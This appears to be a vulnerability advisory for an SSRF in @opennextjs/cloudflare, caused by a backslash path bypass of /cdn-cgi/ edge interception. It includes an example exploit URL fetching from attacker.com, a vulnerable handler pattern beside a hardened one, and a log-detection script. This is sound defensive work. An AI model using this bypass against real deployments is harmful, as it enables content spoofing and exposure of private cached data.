CVE-2026-3125: CWE-918 Server-Side Request Forgery (SSRF) in opennextjs @opennextjs/cloudflare
Description
A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.

The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, so the request matches the handler and triggers an unvalidated fetch of an arbitrary remote URL. For example:

https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com

Here attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com). The response carries the victim's origin, so it can mislead users or other services that trust that domain.

Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests.

Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible, which could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.
AI Analysis
Technical Summary
CVE-2026-3125 is a Server-Side Request Forgery (SSRF) vulnerability in the @opennextjs/cloudflare package, specifically in the /cdn-cgi/image/ handler shipped in the worker template. The handler is intended for development use only: in production, Cloudflare's edge normally intercepts requests to /cdn-cgi/image/ before they reach the Worker, so the handler was never expected to see real traffic.

The root cause is a parser differential between the edge and the Worker. The edge matches the literal path prefix /cdn-cgi/, so a request whose path is written as /cdn-cgi\image/ (backslash instead of forward slash) is not intercepted and is forwarded to the Worker. Inside the Worker, the WHATWG URL parser (the JavaScript URL class) treats a backslash in the path of an http(s) URL as a path separator and serializes it as a forward slash, so url.pathname reads /cdn-cgi/image/... and the request matches the handler. The handler then fetches whatever URL follows the image options segment, without validating its destination. For example, https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com causes the victim site to fetch content from attacker.com and return it under its own domain. The response carries the victim's origin, so users and downstream services that trust that domain are misled.

A similar bypass affects Cloudflare Workers with Assets and Cloudflare Pages: assets stored under /cdn-cgi/ are normally not publicly reachable, but the backslash form of the path reaches them, potentially exposing private data such as the incremental cache Open Next stores under /cdn-cgi/_next_cache.

Exploitation requires an HTTP client that preserves backslashes in the request path (e.g., curl --path-as-is); browsers rewrite backslashes to forward slashes before sending, so the bypass cannot be triggered by a link or an ordinary browser navigation. No known exploits have been reported in the wild at this time. The CVSS 4.0 score of 7.7 (high) reflects a network attack vector with no privileges or user interaction required and partial impact on confidentiality and integrity.

The vulnerability is categorized under CWE-918 (Server-Side Request Forgery) and CWE-706 (Use of Incorrectly-Resolved Name or Reference).
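As an added example (not code from the @opennextjs/cloudflare project or from Cloudflare), the JavaScript below reproduces the URL normalization that makes the bypass work, shows a handler written in the vulnerable pattern, and shows a hardened version that rejects the raw backslash path before parsing, treats /cdn-cgi/ as reserved, and allow-lists fetch destinations. The edge model, IMAGE_RE, ALLOWED_IMAGE_HOSTS and the env.DEV_IMAGE_HANDLER flag are assumptions made for illustration; the functions return a routing decision instead of calling fetch().

```javascript
// Added example, not code from @opennextjs/cloudflare or Cloudflare.
// (1) WHATWG URL normalization behind the bypass, (2) a handler in the
// vulnerable pattern, (3) a hardened version. The edge model, IMAGE_RE,
// ALLOWED_IMAGE_HOSTS and env.DEV_IMAGE_HANDLER are assumptions for
// illustration. Runs on Node 18+ (global URL); nothing is fetched.

// Matches "/cdn-cgi/image/<options>/<target url>" on a normalized pathname.
const IMAGE_RE = /^\/cdn-cgi\/image\/[^/]+\/(.+)$/;

// Hypothetical allow-list of hosts the dev image handler may fetch from.
const ALLOWED_IMAGE_HOSTS = new Set(["images.example.com"]);

// Raw path exactly as the client wrote it (no normalization), minus the origin.
function rawPathOf(rawUrl) {
  return rawUrl.replace(/^https?:\/\/[^/\\?#]+/, "");
}

// (1) In the path of an http(s) URL the WHATWG parser treats "\" as a segment
// separator and serializes it as "/", so pathname no longer contains it.
function normalizedPathname(rawUrl) {
  return new URL(rawUrl).pathname;
}

// Constructed model of the edge behaviour the advisory describes: only a
// literal "/cdn-cgi/" prefix is intercepted; "/cdn-cgi\" is forwarded.
function edgeIntercepts(rawUrl) {
  return rawPathOf(rawUrl).startsWith("/cdn-cgi/");
}

// (2) Vulnerable pattern: route on the normalized pathname and fetch whatever
// follows the options segment, with no check on the destination.
function vulnerableRoute(rawUrl) {
  const m = new URL(rawUrl).pathname.match(IMAGE_RE);
  return m ? { action: "fetch", target: m[1] } : { action: "passthrough" };
}

// (3) Hardened pattern.
function hardenedRoute(rawUrl, env = {}) {
  // a. Refuse a backslash on the raw path before new URL() normalizes it away.
  //    %5C is not decoded by the URL parser, but a downstream layer might
  //    decode it, so the encoded form is refused as well.
  if (/\\|%5c/i.test(rawPathOf(rawUrl))) return { action: "reject", status: 400 };

  const url = new URL(rawUrl);
  if (!url.pathname.startsWith("/cdn-cgi/")) return { action: "passthrough" };

  // b. /cdn-cgi/ is reserved: serve nothing from it (e.g. /cdn-cgi/_next_cache)
  //    unless the dev-only image handler is explicitly enabled.
  const m = env.DEV_IMAGE_HANDLER ? url.pathname.match(IMAGE_RE) : null;
  if (!m) return { action: "reject", status: 404 };

  // c. Only fetch absolute https URLs on an allow-listed host.
  let target;
  try {
    target = new URL(m[1]);
  } catch {
    return { action: "reject", status: 400 };
  }
  if (target.protocol !== "https:" || !ALLOWED_IMAGE_HOSTS.has(target.hostname)) {
    return { action: "reject", status: 403 };
  }
  return { action: "fetch", target: target.href };
}

// The advisory's example; the string literal doubles the backslash.
const BYPASS = "https://victim-site.com/cdn-cgi\\image/aaaa/https://attacker.com";
console.log(edgeIntercepts(BYPASS), normalizedPathname(BYPASS));
console.log(vulnerableRoute(BYPASS), hardenedRoute(BYPASS, { DEV_IMAGE_HANDLER: true }));
```

Run with node. The first line printed is `false /cdn-cgi/image/aaaa/https://attacker.com`: the edge model forwards the request because the raw prefix does not match, while the Worker sees the normalized path. The vulnerable route then returns a fetch of https://attacker.com; the hardened route returns a 400 without ever parsing the URL, and even with the backslash check removed it would still refuse the destination because attacker.com is not on the allow-list.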
Potential Impact
The primary impact of CVE-2026-3125 is that an unauthenticated attacker can make the victim's Worker fetch an arbitrary remote URL and return the result from the victim's domain. That enables content spoofing and phishing pages served from a trusted origin, and any downstream component that trusts responses from that origin is exposed to attacker-controlled content. The related asset bypass exposes files under normally protected /cdn-cgi/ paths, including Open Next's incremental cache under /cdn-cgi/_next_cache, which can contain pre-rendered application state and data that was never meant to be public.

Organizations using the @opennextjs/cloudflare package, Cloudflare Workers with Assets, or Cloudflare Pages are at risk of data exposure and trust violations. Exploitation requires no authentication or user interaction, only an HTTP client that does not rewrite the path, so automated scanning is practical. Although no exploits are known in the wild, the ease of the bypass and the confidentiality and integrity impact make this significant. The scope includes all deployments using the vulnerable package and any configuration that relies on Cloudflare's edge interception of /cdn-cgi/ as a security boundary, covering web applications, APIs, and static asset hosting built on these technologies.
Mitigation Recommendations
To mitigate CVE-2026-3125, organizations should audit their use of the @opennextjs/cloudflare package and any Cloudflare Workers or Pages deployment that keeps content under /cdn-cgi/ paths. Specific recommendations:
1) Do not ship the development-only /cdn-cgi/image/ handler to production. Gate it on a build-time or environment flag so the code path is absent from the deployed Worker, rather than relying on edge interception to keep it unreachable.
2) Validate the raw request path before any URL parsing. Reject requests whose path contains a literal backslash (or its percent-encoded form %5C) with a 400; no legitimate client sends one. A check on url.pathname after new URL() runs too late, because the normalization has already happened.
3) Add a Cloudflare WAF custom rule or Transform Rule that blocks or rewrites requests with a backslash in the path, especially those aimed at /cdn-cgi/. Confirm with curl --path-as-is that the rule matches the un-normalized path; a rule evaluated on an already-normalized path will never fire.
4) Treat every path that normalizes to /cdn-cgi/ as reserved: have the Worker return 404 for it instead of falling through to assets, and do not place sensitive data such as the incremental cache in an asset directory whose protection depends on the edge alone.
5) Monitor request logs for backslashes or %5C in paths, and monitor Worker-initiated fetches for destinations outside the hosts the application is expected to contact.
6) Update to a patched version of @opennextjs/cloudflare once available, or apply vendor-provided fixes.
7) Make developers aware that edge interception of /cdn-cgi/ is a convenience, not a security boundary, and apply defense in depth.
8) For every outbound fetch() the Worker performs on behalf of a request, enforce an allow-list of trusted destination schemes and hosts in code; outbound fetch() from a Worker is not subject to a per-Worker network egress filter, so the allow-list is the control.
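To make recommendation 5 concrete, here is an added detection example (not part of the advisory and not Cloudflare tooling) that scans JSON-lines request and outbound-fetch records for the two signals above: a backslash or %5C in the raw request path that lands on /cdn-cgi/, and a Worker-initiated fetch to a host outside an allow-list, correlated per rayId so a bypass request and the fetch it triggered appear as one incident. The log shape, the sample records and TRUSTED_FETCH_HOSTS are constructed assumptions for this example.

```javascript
// Added example, not part of the advisory or of Cloudflare's tooling.
// The log shape (one JSON object per line with "rayId", "event" and "url")
// and the sample records are constructed; TRUSTED_FETCH_HOSTS is hypothetical.
// Runs on Node 18+.

// Constructed sample: a benign request, a literal-backslash bypass attempt and
// the Worker fetch it triggered (same rayId), a percent-encoded probe for the
// incremental cache, and a legitimate fetch to an allow-listed host.
const SAMPLE_LOG = [
  '{"rayId":"a1","event":"request","url":"https://victim-site.com/about"}',
  '{"rayId":"a2","event":"request","url":"https://victim-site.com/cdn-cgi\\\\image/aaaa/https://attacker.com"}',
  '{"rayId":"a2","event":"fetch","url":"https://attacker.com/"}',
  '{"rayId":"a3","event":"request","url":"https://victim-site.com/cdn-cgi%5C_next_cache/page.json"}',
  '{"rayId":"a4","event":"fetch","url":"https://images.example.com/hero.png"}',
];

// Hosts the Worker is expected to fetch from on behalf of requests.
const TRUSTED_FETCH_HOSTS = new Set(["images.example.com"]);

// Raw path as the client sent it, without the origin and without normalization.
function rawPathOf(rawUrl) {
  return rawUrl.replace(/^https?:\/\/[^/\\?#]+/, "");
}

// Findings for one record; empty array when nothing is suspicious.
function analyzeRecord(rec) {
  const findings = [];
  if (rec.event === "request") {
    const rawPath = rawPathOf(rec.url);
    const hasBackslash = /\\|%5c/i.test(rawPath);
    if (hasBackslash) findings.push("backslash-in-path");
    // Collapse both backslash forms to "/" to see which reserved prefix the
    // request was aiming at once a lenient layer normalizes it.
    const collapsed = rawPath.replace(/\\|%5c/gi, "/");
    if (hasBackslash && collapsed.startsWith("/cdn-cgi/")) findings.push("cdn-cgi-bypass");
  } else if (rec.event === "fetch") {
    const host = new URL(rec.url).hostname;
    if (!TRUSTED_FETCH_HOSTS.has(host)) findings.push(`untrusted-fetch:${host}`);
  }
  return findings;
}

// Scans JSON lines and groups findings by rayId. Returns Map<rayId, string[]>.
function scanLog(lines) {
  const incidents = new Map();
  for (const line of lines) {
    const rec = JSON.parse(line);
    const findings = analyzeRecord(rec);
    if (findings.length === 0) continue;
    const list = incidents.get(rec.rayId) ?? [];
    list.push(...findings);
    incidents.set(rec.rayId, list);
  }
  return incidents;
}

for (const [rayId, findings] of scanLog(SAMPLE_LOG)) {
  console.log(rayId, findings.join(", "));
}
```

On the sample, rayId a2 is reported with the bypass request and the untrusted fetch to attacker.com together, a3 is reported for the encoded probe at the cache path, and a1 and a4 are silent. In a real deployment the same two checks can be applied to whatever log export carries the request URL and the Worker's subrequest URLs.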
Affected Countries
United States, Germany, United Kingdom, France, Japan, South Korea, Australia, Canada, Netherlands, Singapore
Technical Details
- Data Version: 5.2
- Assigner Short Name: cloudflare
- Date Reserved: 2026-02-24T14:15:54.385Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69a87af1d1a09e29cb563d8c
Added to database: 3/4/2026, 6:33:21 PM
Last enriched: 3/4/2026, 6:47:42 PM
Last updated: 3/4/2026, 7:36:29 PM